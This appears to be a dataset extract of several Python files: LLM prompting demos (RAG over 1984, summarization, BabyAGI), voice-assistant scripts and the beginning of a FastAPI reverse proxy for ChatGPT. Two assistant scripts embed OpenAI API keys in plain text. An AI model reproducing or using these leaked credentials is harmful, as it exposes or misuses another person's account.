- You should not provide any information that is not directly related to the question.
- Keep your answers short and to the point.
"""
),
},
{
"role": "system",
"content": format_prompt(
f"""
Here are some direct excerpts from the book 1984 related to the user's question:
{related_passages}
"""
),
},
{
"role": "user",
"content": f"""Here is the users question:
{question}
""",
},
],
model="gpt-4",
temperature=0,
seed=256,
max_tokens=128,
stream=True,
)
async for message in result:
assert len(message.choices) > 0, "No choices were provided."
content = message.choices[0].delta.content
yield content
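# RAG step: the top-5 passages retrieved from the vector store are injected as a second system
# message ahead of the user's question, and the answer is streamed back token by token via
# stream=True.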
def sliding_window(iterable: list[str], window_size: int, stride: int) -> Iterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
total_iterations = math.ceil((len(iterable) - window_size) / stride) + 1
with tqdm.tqdm(desc="Sliding Window", total=total_iterations) as progress:
for i in range(0, len(iterable) - window_size + 1, stride):
yield iterable[i : i + window_size]
progress.update(1)
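# Chunking strategy: windows of window_size sentences advanced by stride sentences (16 and 8 in
# read_or_create_vecdb below), so consecutive chunks overlap by half a window and retrieved
# passages keep some surrounding context.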
async def read_or_create_vecdb() -> VectorDatabase:
## Check if vecdb exists
vecdb_filename = "./data/vecdb.json"
if os.path.exists(vecdb_filename):
vecdb = VectorDatabase.load_from_file(vecdb_filename)
else:
vecdb = VectorDatabase(text=[], embeddings=np.empty((0, 1536), dtype=np.float32))
window_size = 16
stride = 8
sentences: list[str] = sent_detector.tokenize(book_1984) # type: ignore
def join_sentences(sentences: list[str]) -> str:
return " ".join(sentences)
chunks = [i for i in map(join_sentences, sliding_window(sentences, window_size, stride))]
await execute([vecdb.add_text(chunk) for chunk in chunks], desc="Adding to vecdb")
vecdb.save_to_file(vecdb_filename)
return vecdb
@app.command()
async def ask_1984():
vecdb = await read_or_create_vecdb()
text: str = str(typer.prompt("What question / advice do you want to ask about the book 1984?", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("\n")
async for token in get_ask_1984_response(vecdb, text):
typer.echo(token, nl=False)
@app.command()
async def vec_lookup(n: int = 3):
vecdb = await read_or_create_vecdb()
text: str = str(typer.prompt(f"Query top {n} results from the vecdb", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("\n")
for passage in await vecdb.top_k(text, k=n):
typer.echo(passage)
typer.echo("\n")
if __name__ == "__main__":
app()
| [
"\n Here are some direct excerpts from the book 1984 related to the users question:\n \n PLACEHOLDER\n ",
"Here is the users question:\n \n PLACEHOLDER\n ",
"\n You are an AI question answer bot built with the knowledge and lessons from the famous book 1984 by George Orwell. You have one goal: to answer questions and give advice about the book 1984. \n Guideless:\n - You should answer the question directly and not provide any other information.\n - You should not provide any information that is not directly related to the question.\n - Keep your answers short and to the point.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~1_zero_shot.py | import openai
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
@app.command()
async def cowboy_translator():
"""Translate text into cowboy speak."""
text: str = str(typer.prompt("What do you want to translate?", type=str))
assert len(text) > 0, "Please provide some text to translate."
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(f"""
You are a friendly AI cowboy. You have one goal: to translate text into cowboy speak.
Here is the input text: {text}
What is the cowboy translation? Please output just the translation and nothing else.
""")
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
typer.echo("Translation: ", nl=False)
async for message in response:
assert len(message.choices) > 0, "No translation was provided."
typer.echo(message.choices[0].delta.content, nl=False)
if __name__ == "__main__":
app() | [
"\n You are a friendly AI cowboy. You have one goal: to translate text into cowboy speak.\n \n Here is the input text: PLACEHOLDER\n \n What is the cowboy translation? Please output just the translation and nothing else.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~6_higher_order_functions_reduce.py | import asyncio
from itertools import islice
from typing import AsyncIterable, Generator, Iterable
import nltk.data
import numpy as np
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download('punkt')
client = openai.AsyncOpenAI()
app = AsyncTyper()
sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')
ARTICLE = """
OpenAI's board of directors' abruptly firing CEO Sam Altman then bringing him back days later did not come out of nowhere.
In fact, the boardroom drama represented the boiling over of tensions that have long simmered under the surface of the company.
Following days of upheaval, Altman is again leading the company and a newly-formed board of directors is charting the path ahead, but the chaos at OpenAI can be traced back to the unusual way the company was structured.
OpenAI was founded in 2015 by Altman, Elon Musk and others as a non-profit research lab. It was almost like an anti-Big Tech company; it would prioritize principles over profit. It wanted to, as OpenAI put it back then, develop AI tools that would "benefit humanity as a whole, unconstrained by a need to generate financial return."
With his sudden return to OpenAI, Sam Altman becomes the latest 'boomerang CEO'
BUSINESS
With his sudden return to OpenAI, Sam Altman becomes the latest 'boomerang CEO'
But in 2018, two things happened: First, Musk quit the board of OpenAI after he said he invested $50 million, cutting the then-unknown company off from more of the entrepreneur's crucial financial backing.
And secondly, OpenAI's leaders grew increasingly aware that developing and maintaining advanced artificial intelligence models required an immense amount of computing power, which was incredibly expensive.
Balancing ideals with the need for funding
A year after Musk left, OpenAI created a for-profit arm. Technically, it is what's known as a "capped profit" entity, which means investors' possible profits are capped at a certain amount. Any remaining money is re-invested in the company.
Yet the nonprofit's board and mission still governed the company, creating two competing tribes within OpenAI: adherents to the serve-humanity-and-not-shareholders credo and those who subscribed to the more traditional Silicon Valley modus operandi of using investor money to release consumer products into the world as rapidly as possible in hopes of cornering a market and becoming an industry pacesetter.
Altman, a 38-year-old techno-optimist who previously led the prestigious startup accelerator Y Combinator, tried to thread the needle between the two approaches. He struck something of a middle ground by unveiling new OpenAI tools gradually, first to smaller groups, then larger ones, to fine-tune and refine the tools before making them public.
ChatGPT's success attracts Big Tech money
When OpenAI kicked off a seismic shift in the tech industry with its launch of ChatGPT last year, the company's most prominent investor, Microsoft, greatly increased its financial stake. It upped its commitment to OpenAI to the tune of $13 billion.
Microsoft became the financial engine that powered OpenAI, but the nonprofit's board of directors still called all the shots. Despite Microsoft's sizable investment, it did not have a seat on OpenAI's board.
All of this set the stage for Altman's sudden ouster from the company earlier this month.
The board itself has still not explained why it fired Altman — beyond saying, in vague terms, that it believed Altman had not been "consistently candid in his communications with the board." And the company's structure gives the board that right: it has complete, unchecked power to remove the CEO whenever it sees fit.
Sources close to the discussions say before Altman's termination, he had been at odds with members of the board over the hasty commercialization of OpenAI products. Board members worried whether Altman was considering the risks of AI products seriously enough, or just trying to maintain the company's dominant position in the crowded and competitive world of generative AI development.
The dangers of powerful AI range from supercharging the spread of disinformation, massive job loss and human impersonation exploited by bad actors.
The question was, did Altman abandon OpenAI's founding principles to try to scale up the company and sign up customers as fast as possible? And, if so, did that make him unsuited to helm a nonprofit created to develop AI products "free from financial obligations"?
Whatever its reasoning, there was nothing Microsoft, or any company executive, could do when the board moved to jettison Altman. The dramatic gesture, and then reversal, illustrated the tension at the heart of OpenAI's structure.
An anonymous letter written by former OpenAI employees during the Altman drama called on the board to examine whether Altman was putting commercial products and fundraising goals before the nonprofit's founding mission.
"We implore you, the Board of Directors, to remain steadfast in your commitment to OpenAI's original mission and not succumb to the pressures of profit-driven interests," the letter states. "The future of artificial intelligence and the well-being of humanity depend on your unwavering commitment to ethical leadership and transparency."
An uneasy resolution
OpenAI's board at first refused to entertain the possibility of Altman returning, but then something happened they could not ignore: 702 out of OpenAI's 770 employees committed to leaving the company unless Altman was restored. The employees also asked that a new board be assembled. It was, and Altman was restored as CEO not long after.
Just one former board member sits on the new, temporary board: Adam D'Angelo, the CEO of the question-and-answer site Quora. He had voted for Altman's ouster.
Others, who are familiar to Silicon Valley boards, have taken seats alongside him. They include Bret Taylor, a longtime Silicon Valley executive and former chairman of the board of Twitter, and former Treasury Secretary Larry Summers.
As it stands, OpenAI's charter says it is committed to the development of artificial general intelligence, also known as AGI, or a type of AI superintelligence that can outperform humans, that will not "harm humanity or unduly concentrate power."
But success in Silicon Valley almost always requires massive scale and the concentration of power — something that allowed OpenAI's biggest funder, Microsoft, to become one of the most valuable companies in the world. It is hard to imagine Microsoft would invest $13 billion into a company believing it would not one day have an unmovable foothold in the sector.
Under the board's current mission, developing AI systems should be undertaken with the main goal of benefiting all of humanity, with no regard to ever turning a profit for outside investors.
Yet the for-profit entity of OpenAI will continue to recruit moneyed enthusiasts who want in on the AI goldrush. The two sides are at cross purposes, with no clear way to co-exist.
The new board is expected to grow and include a representative from Microsoft. Among the board's tasks: taking a hard look at OpenAI's structure. Does the hybrid model create too much friction? Or is there a way to forge ahead with a middle-of-the-road approach?
"""
async def sliding_window(iterable: list[str], size: int) -> AsyncIterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
iterators = [list(islice(iterable, i, None)) for i in range(size)]
## progress
with tqdm.tqdm(desc="Sliding Window", total=len(iterable)) as progress:
for item in zip(*iterators):
yield item
progress.update(1)
@async_disk_cache(filename="./data/cache.db")
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def condense(summary: str, new_information: str) -> str:
"""Condense a summary with new information."""
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are an AI summarizer. You have one goal: to condense a summary of a news article with new information from the article.
Guidelines
- Make every word count: Rewrite the previous summary to improve flow and make space for additional entities
- Ensure key details are not lost: The new summary should contain all the entities from the previous summary
- Never drop entities from the previous summary. If space cannot be made, add fewer new entities.
- The new summary should be highly dense and concise yet self-contained, e.g., easily understood without the Article.
- Make space with fusion, compression, and removal of uninformative phrases like "the article discusses"
- Missing entities can appear anywhere in the new summary
- Keep the summary at a maximum of 4-5 sentences long
An Entity is a real-world object that's assigned a name - for example, a person, a country, a product, or a book title.
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Here is the previous summary along with the new information is provided below.
Here is the summary: {summary}
Here is the new information: {new_information}
Please output a new condensed summary and nothing else.
"""
),
}
],
max_tokens=30*6,
temperature=0.9,
seed=256,
model="gpt-3.5-turbo-0613",
)
assert len(response.choices) > 0, "No choices were returned."
content = response.choices[0].message.content
assert content is not None, "No text was provided."
return content
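# Reduce-based summarization: the article is split into overlapping 4-sentence windows, and
# areduce folds them through condense, threading a running summary that is rewritten as each new
# window of information arrives.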
@app.command()
async def reduce_example():
typer.echo("Running reduce based summary on news article.")
typer.echo("\n")
window_size = 4
sentences: list[str] = sent_detector.tokenize(ARTICLE) # type: ignore
async def join_sentences(sentences: list[str]) -> str: return " ".join(sentences)
summary = await areduce(condense, amap(join_sentences, sliding_window(sentences, window_size)), initial="")
typer.echo(f"Summary: {summary}")
if __name__ == "__main__":
app()
| [
"\n Here is the previous summary along with the new information is provided below.\n \n Here is the summary: PLACEHOLDER\n \n Here is the new information: PLACEHOLDER\n\n Please output a new condensed summary and nothing else.\n ",
"\n You are an AI summarizer. You have one goal: to condense a summary of a news article with new information from the article.\n\n Guidelines\n - Make every word count: Rewrite the previous summary to improve flow and make space for additional entities\n - Ensure key details are not lost: The new summary should contain all the entities from the previous summary\n - Never drop entities from the previous summary. If space cannot be made, add fewer new entities.\n - The new summary should be highly dense and concise yet self-contained, eg., easily understood without the Article.\n - Make space with fusion, compression, and removal of uninformative phrases like \"the article discusses\"\n - Missing entities can appear anywhere in the new summary\n - Keep the summary at a maximum of 4-5 sentences long\n\n An Entity is a real-world object that's assigned a name - for example, a person, country a product or a book title.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~9_babyagi.py | import asyncio
import json
import math
import os
from collections import deque
from itertools import islice
from typing import AsyncIterable, Iterable, Optional
import networkx as nx
import nltk
import numpy as np
import numpy.typing as npt
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
app = AsyncTyper()
func = wrap_chatcompletion(client.chat.completions.create)
class VectorDatabase(BaseModel):
text: list[str]
embeddings: npt.NDArray[np.float32]
class Config:
arbitrary_types_allowed = True
def save_to_file(self, filename: str):
# Convert NumPy array to a list for JSON serialization
data = {"text": self.text, "embeddings": self.embeddings.tolist()}
with open(filename, "w") as file:
json.dump(data, file)
@classmethod
def load_from_file(cls, filename: str):
with open(filename, "r") as file:
data = json.load(file)
# Convert list back to NumPy array
data["embeddings"] = np.array(data["embeddings"], dtype=np.float32)
return cls(**data)
async def add_text(self, text: str) -> None:
embeddings_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=text,
)
embedding: npt.NDArray[np.float32] = np.expand_dims(
np.array(embeddings_response.data[0].embedding), axis=0
)
self.text.append(text)
self.embeddings = np.concatenate([self.embeddings, embedding], axis=0)
async def top_k(self, query: str, k: int = 10) -> list[str]:
query_embedding_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=query,
)
query_embedding: npt.NDArray[np.float32] = np.array(
query_embedding_response.data[0].embedding
)
# cosine similarity
similarity: npt.NDArray[np.float32] = np.dot(query_embedding, self.embeddings.T) / (
np.linalg.norm(query_embedding) * np.linalg.norm(self.embeddings, axis=1)
)
sorted_similarity_indices: npt.NDArray[np.int64] = np.argsort(similarity)[::-1]
top_k: list[str] = [self.text[i] for i in sorted_similarity_indices[:k]]
return top_k
class TaskNames(BaseModel):
names: list[str]
class Task(BaseModel):
task_id: int = Field(..., description="The unique identifier for the task.")
task_name: str = Field(..., description="The name of the task.")
class TaskResult(BaseModel):
task_name: str = Field(..., description="The name of the task.")
task_result: str = Field(..., description="The result of the task.")
class SingleTaskListStorage:
def __init__(self):
self.tasks: deque[Task] = deque([])
self.task_id_counter = 0
def append(self, task: Task):
self.tasks.append(task)
def replace(self, tasks: list[Task]):
self.tasks = deque(tasks)
def popleft(self) -> Task:
return self.tasks.popleft()
def is_empty(self):
return False if self.tasks else True
def next_task_id(self) -> int:
self.task_id_counter += 1
return self.task_id_counter
def get_task_names(self):
return [t.task_name for t in self.tasks]
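# BabyAGI loop (implemented by the agents below and driven by the CLI command at the bottom of
# the file):
#   1. execution_agent performs the current task, conditioned on the objective and the top-k most
#      similar previous task results from the vector store;
#   2. task_creation_agent proposes follow-up tasks from the latest result;
#   3. task_priority_agent re-orders the task queue against the objective.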
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def execution_agent(vecdb: VectorDatabase, objective: str, task: Task, k: int = 5) -> TaskResult:
related_entries = await vecdb.top_k(task.task_name, k=k)
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. Your role is to execute tasks in pursuit of a goal.
You will perform one task based on the objective: {objective}.
Take into account previous relevant tasks you have performed: {related_entries}.
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Please output your response to the following task: {task.task_name}
Be as direct as possible and do not provide any other information.
"""
),
},
],
model="gpt-4",
temperature=0,
seed=256,
max_tokens=128,
)
assert len(result.choices) > 0, "No choices were provided."
content = result.choices[0].message.content
assert content is not None, "No content was provided."
return TaskResult(task_name=task.task_name, task_result=content)
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def task_creation_agent(objective: str, task_result: TaskResult, task_list: SingleTaskListStorage, max_new_tasks: int = 3) -> TaskNames:
result: Optional[TaskNames] = None
for _ in range(3):
try:
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. Your role is to execute tasks in pursuit of a goal.
You are to use the result from an execution agent to create new tasks with the following objective: {objective}.
The last completed task has the result: {task_result.model_dump_json()}
This result was based on this task description: {task_result.task_name}.
"""
),
},
]
if not task_list.is_empty():
messages.append({
"role": "system",
"content": format_prompt(
f"""
You have the following incomplete tasks in your task list: {task_list.get_task_names()}
"""
),
})
messages.append({
"role": "user",
"content": format_prompt(
f"""
Add a list of tasks to your task list. Each task should be on a new line and not conflict with the objective or other tasks.
If no tasks need to be added, just output an empty list.
"""
),
})
result = await asyncio.wait_for(
func(
messages=messages,
model="gpt-3.5-turbo-0613",
response_model=TaskNames,
temperature=0.1,
seed=256,
),
timeout=30,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return result
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def task_priority_agent(objective: str, task_list: SingleTaskListStorage) -> TaskNames:
result: Optional[TaskNames] = None
tasks_prompt = "\n".join(task_list.get_task_names())
for _ in range(3):
try:
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. Your role is to execute tasks in pursuit of a goal.
You are tasked with prioritizing the following tasks:
{tasks_prompt}
Consider the ultimate objective of your team: {objective}.
Tasks should be sorted from highest to lowest priority, where higher-priority tasks are those that act as pre-requisites or are more essential for meeting the objective.
Do not remove any tasks. Return the ranked tasks in the order of priority:
"""
),
},
]
result = await asyncio.wait_for(
func(
messages=messages,
model="gpt-3.5-turbo-0613",
response_model=TaskNames,
temperature=0.1,
seed=256,
),
timeout=30,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return result
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def best_breakfast_result(objective: str, task_results: list[TaskResult]) -> AsyncIterable[str]:
tasks_prompt = "\n".join(map(lambda t: t.model_dump_json(), task_results))
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. Your role is to execute tasks in pursuit of a goal.
You have just executed a series of tasks in pursuit of an objective: {objective}.
Here are your task results:
{tasks_prompt}
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Based on the task results, answer the objective: {objective}.
Output a single distinctive answer that is as short as possible.
"""
),
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
async for message in result:
assert len(message.choices) > 0, "No translation was provided."
content = message.choices[0].delta.content
if content is not None:
yield content
async def read_or_create_vecdb(vecdb_filename) -> VectorDatabase:
if os.path.exists(vecdb_filename):
vecdb = VectorDatabase.load_from_file(vecdb_filename)
else:
vecdb = VectorDatabase(text=[], embeddings=np.empty((0, 1536), dtype=np.float32))
vecdb.save_to_file(vecdb_filename)
return vecdb
@app.command()
async def vec_lookup(n: int = 8):
## Load vecdb
vecdb_filename = "./data/vecdb.json"
vecdb = await read_or_create_vecdb(vecdb_filename)
## Collect user input task
objective: str = str(typer.prompt(f"BabyAGI objective", type=str))
assert len(objective) > 0, "Please provide some text."
task: str = str(typer.prompt(f"BabyAGI task", type=str))
assert len(task) > 0, "Please provide some text."
## Add first task to the task list
tasks = SingleTaskListStorage()
initial_task = Task(task_id=tasks.next_task_id(), task_name=task)
tasks.append(initial_task)
## history
history: list[TaskResult] = []
## Run babyagi for n steps
for step in range(n):
if tasks.is_empty():
typer.echo(f"Done!")
else:
typer.echo("\n")
typer.echo(f"*** Step {step} ***")
## Log the task list and current task
typer.echo(f"Task list:")
for name in tasks.get_task_names():
typer.echo(f" - {name}")
current_task = tasks.popleft()
typer.echo(f"Current task: {current_task.task_name}")
## Execute the current task
current_task_result = await execution_agent(vecdb, objective, current_task)
await vecdb.add_text(current_task_result.model_dump_json())
history.append(current_task_result)
typer.echo(f"Current tasks result: {current_task_result.task_result}")
## Create new tasks
new_task_names = await task_creation_agent(
objective, current_task_result, tasks
)
for new_task_name in new_task_names.names:
tasks.append(Task(task_id=tasks.next_task_id(), task_name=new_task_name))
## Prioritize tasks
new_task_names = await task_priority_agent(objective, tasks)
tasks = SingleTaskListStorage()
for new_task_name in new_task_names.names:
tasks.append(Task(task_id=tasks.next_task_id(), task_name=new_task_name))
typer.echo(f"History:")
max_str_len = 50
for task_result in history:
if len(task_result.task_result) > max_str_len:
typer.echo(f" - {task_result.task_name}: {task_result.task_result[:max_str_len]}...")
else:
typer.echo(f" - {task_result.task_name}: {task_result.task_result}")
typer.echo("\n")
typer.echo("\n")
typer.echo("\n")
typer.echo(f"Objective result:")
async for token in best_breakfast_result(objective, history):
typer.echo(token, nl=False)
if __name__ == "__main__":
app()
| [
"\n",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You have just executed a series of tasks in pursuit of an objective: PLACEHOLDER.\n \n Here are your task results:\n PLACEHOLDER\n ",
"\n Add a list of tasks to your task list. Each task should be on a new line and not conflict with the objective or other tasks.\n \n If no tasks need to be added, just output an empty list.\n ",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You will perform one task based on the objective: PLACEHOLDER.\n \n Take into account previous relevant tasks you have performed: PLACEHOLDER.\n ",
"\n Based on the task results, answer the objective: PLACEHOLDER.\n \n Output a single distinctive answer that is as short as possible.\n ",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You are tasked with prioritizing the following tasks:\n PLACEHOLDER\n\n Consider the ultimate objective of your team: PLACEHOLDER.\n \n Tasks should be sorted from highest to lowest priority, where higher-priority tasks are those that act as pre-requisites or are more essential for meeting the objective.\n Do not remove any tasks. Return the ranked tasks in the order of priority:\n "
] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | model_v1.4.py | import requests
from bs4 import BeautifulSoup
import pyttsx3
import speech_recognition as sr
import datetime
import openai
# openai.api_key = "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"
def speak(data):
engine = pyttsx3.init()
engine.setProperty('rate', 150)
engine.setProperty('volume', 1)
engine.say(data)
engine.runAndWait()
# def get_audio():
# r = sr.Recognizer()
# with sr.Microphone() as source:
# print("Speak:")
# r.adjust_for_ambient_noise(source)
# audio = r.listen(source)
# # said = ""
# said = r.recognize_google(audio)
#
# try:
# print("You said: \n" + said)
# except sr.UnknownValueError:
# print("Sorry, could not understand your speech.")
# except sr.RequestError as e:
# print("Request error; {0}".format(e))
#
# return said.lower()
def get_audio():
engine = pyttsx3.init()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Speak:")
# r.adjust_for_ambient_noise(source)
audio = r.listen(source)
try:
voice_command = r.recognize_google(audio)
print(f"User said: {voice_command}")
except sr.UnknownValueError:
print("Sorry, I did not understand that.")
engine.say("Sorry, I did not understand that.")
engine.runAndWait()
exit()
except sr.RequestError:
print("Sorry, I could not process your request.")
engine.say("Sorry, I could not process your request.")
engine.runAndWait()
return voice_command.lower()
# def query(user_query):
# url = "https://www.google.co.in/search?q=" + user_query
# headers = {
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
# '(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
# }
# page = requests.get(url, headers=headers)
# soup = BeautifulSoup(page.content, 'html.parser')
# results = soup.find(class_='Z0LcW t2b5Cf').get_text()
# print(results)
# return results
def chatgpt(user_query):
response = openai.Completion.create(engine='text-davinci-003',
prompt=user_query,
n=1,
temperature=0.5,
max_tokens=50,
top_p=1)
return response['choices'][0]['text']
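# Main loop below: the assistant idles until an utterance containing the wake word ("hello") is
# heard, then listens for a command. Built-in intents (lights, time, date, weather) are checked
# first; anything left unmatched (flag != 1) is forwarded to the Completion API via chatgpt().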
WAKE = "hello"
speak("Active")
while True:
flag = 0
print("Active")
# speak("Active")
texts = get_audio()
if texts.count(WAKE) > 0:
print("I am listening")
speak("I am listening")
try:
text = get_audio()
# result = query(text)
# on = ["turn on the lights", "switch on the lights", "lights on"]
# for phrase in on:
if 'switch on' in text:
flag = 1
speak("Turning on the lights")
# do something
# off = ["Turn off the lights", "Switch off the lights", "Lights off"]
# for phrase in off:
if 'switch off' in text:
flag = 1
speak("Turning off the lights")
# do something
# time = ["What is the time"]
# for phrase in time:
if 'time now' in text:
flag = 1
now = datetime.datetime.now()
time_string = now.strftime("The time is %I:%M %p.")
speak(time_string)
print(time_string)
# date = ["What is the date"]
# for phrase in time:
if 'date today' in text:
flag = 1
now = datetime.datetime.now()
date_string = now.strftime("Today's date is %B %d, %Y.")
speak(date_string)
print(date_string)
if 'weather' in text:
api_url = 'https://api.api-ninjas.com/v1/weather?city={}'.format(text)
response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'})
if response.status_code == requests.codes.ok:
print(response.text)
if flag != 1:
result = chatgpt(text)
print(result)
speak(result)
except sr.UnknownValueError:
# print('Sorry no result')
speak('Sorry no result')
if 'terminate' in texts:
speak("Terminating")
print("Terminating")
exit()
| [] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | model_v1.3.py | import requests
from bs4 import BeautifulSoup
import pyttsx3
import speech_recognition as sr
import datetime
# import openai
# openai.api_key = "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"
def speak(data):
engine = pyttsx3.init()
engine.say(data)
engine.runAndWait()
# def get_audio():
# r = sr.Recognizer()
# with sr.Microphone() as source:
# print("Speak:")
# r.adjust_for_ambient_noise(source)
# audio = r.listen(source)
# # said = ""
# said = r.recognize_google(audio)
#
# try:
# print("You said: \n" + said)
# except sr.UnknownValueError:
# print("Sorry, could not understand your speech.")
# except sr.RequestError as e:
# print("Request error; {0}".format(e))
#
# return said.lower()
def get_audio():
engine = pyttsx3.init()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Speak:")
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
try:
voice_command = r.recognize_google(audio)
print(f"User said: {voice_command}")
except sr.UnknownValueError:
print("Sorry, I did not understand that.")
engine.say("Sorry, I did not understand that.")
engine.runAndWait()
exit()
except sr.RequestError:
print("Sorry, I could not process your request.")
engine.say("Sorry, I could not process your request.")
engine.runAndWait()
return voice_command
def query(user_query):
url = "https://www.google.co.in/search?q=" + user_query
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
}
page = requests.get(url, headers=headers)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find(class_='Z0LcW t2b5Cf').get_text()
print(results)
return results
# def chatgpt(user_query):
# response = openai.Completion.create(engine='text-davinci-003',
# prompt=user_query,
# n=1,
# temperature=0.5,
# max_tokens=50,
# top_p=1)
# return response['choices'][0]['text']
WAKE = "hello"
speak("AActive")
while True:
flag = 0
print("Active")
# speak("Active")
texts = get_audio()
if texts.count(WAKE) > 0:
print("I am listening")
speak("I am listening")
try:
text = get_audio()
# result = query(text)
# on = ["turn on the lights", "switch on the lights", "lights on"]
# for phrase in on:
if 'switch on' in text:
flag = 1
speak("Turning on the lights")
# do something
# off = ["Turn off the lights", "Switch off the lights", "Lights off"]
# for phrase in off:
if 'switch off' in text:
flag = 1
speak("Turning off the lights")
# do something
# time = ["What is the time"]
# for phrase in time:
if 'time now' in text:
flag = 1
now = datetime.datetime.now()
time_string = now.strftime("The time is %I:%M %p.")
speak(time_string)
print(time_string)
# date = ["What is the date"]
# for phrase in time:
if 'date today' in text:
flag = 1
now = datetime.datetime.now()
date_string = now.strftime("Today's date is %B %d, %Y.")
speak(date_string)
print(date_string)
# if flag != 1:
# result = chatgpt(text)
# print(result)
# speak(result)
except sr.UnknownValueError:
# print('Sorry no result')
speak('Sorry no result')
| [] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | test3.py | import openai
openai.api_key = "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"
def chatgpt(user_query):
response = openai.Completion.create(engine='text-ada-001',
prompt=user_query,
n=1,
temperature=0.5)
return response.choices[0].text
prompt = "Hello, how are you?"
print(chatgpt(prompt))
| [
"Hello, how are you?"
] |
2024-01-10 | 18870/chatgpt-proxy | chatgpt_proxy~proxy.py | import asyncio
import logging
from typing import Optional
from urllib.parse import urlparse, urlunparse, ParseResult
import httpx
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import StreamingResponse
logger = logging.getLogger(__name__)
class ReverseProxy:
ALL_METHODS = [
"GET",
"POST",
"HEAD",
"PUT",
"DELETE",
"OPTIONS",
"PATCH",
"TRACE",
"CONNECT",
]
def __init__(self, base_url: str) -> None:
self.base_url = base_url
self.client = httpx.AsyncClient(base_url=base_url)
_url = urlparse(base_url)
self._domain = _url.netloc
self._origin = urlunparse(
ParseResult(
scheme=_url.scheme,
netloc=_url.netloc,
path="",
params="",
query="",
fragment="",
)
)
self._preset_headers = {
"host": self._domain,
"origin": self._origin,
"referer": self.base_url,
}
async def _prepare_cookies(self, request: Request):
return request.cookies.copy()
async def _prepare_headers(self, request: Request):
# Note that all header keys are lowercased
headers = dict(request.headers)
# cookie in headers have higher priority
# so remove it here and let cookies parameter take effect
headers.pop("cookie", None)
# preset header
headers.update(self._preset_headers)
return headers
async def _process_response(self, response: httpx.Response):
pass
async def proxy(self, request: Request, path: str):
# https://github.com/tiangolo/fastapi/discussions/7382#discussioncomment-5136454
logger.info(f"Proxying {request.method} {request.url}")
rp_resp = await self._send_request(
path=path,
query=request.url.query.encode("utf-8"),
method=request.method,
headers=await self._prepare_headers(request),
cookies=await self._prepare_cookies(request),
content=request.stream(),
)
await self._process_response(rp_resp)
# Handle Set-Cookie headers
headers = rp_resp.headers.copy()
headers.pop("set-cookie", None)
resp = StreamingResponse(
rp_resp.aiter_raw(),
status_code=rp_resp.status_code,
headers=headers,
)
for key, value in rp_resp.cookies.items():
resp.set_cookie(key=key, value=value)
return resp
async def _send_request(self, path: str, query: bytes, **kwargs) -> httpx.Response:
url = httpx.URL(path=path, query=query)
rp_req = self.client.build_request(url=url, **kwargs)
rp_resp = await self.client.send(rp_req, stream=True)
return rp_resp
def attach(self, app: FastAPI, path: str, **kwargs) -> None:
path = path.rstrip("/")
app.add_api_route(
path + "/{path:path}",
self.proxy,
methods=self.ALL_METHODS,
description=f"Reverse proxy of {self.base_url}",
**kwargs,
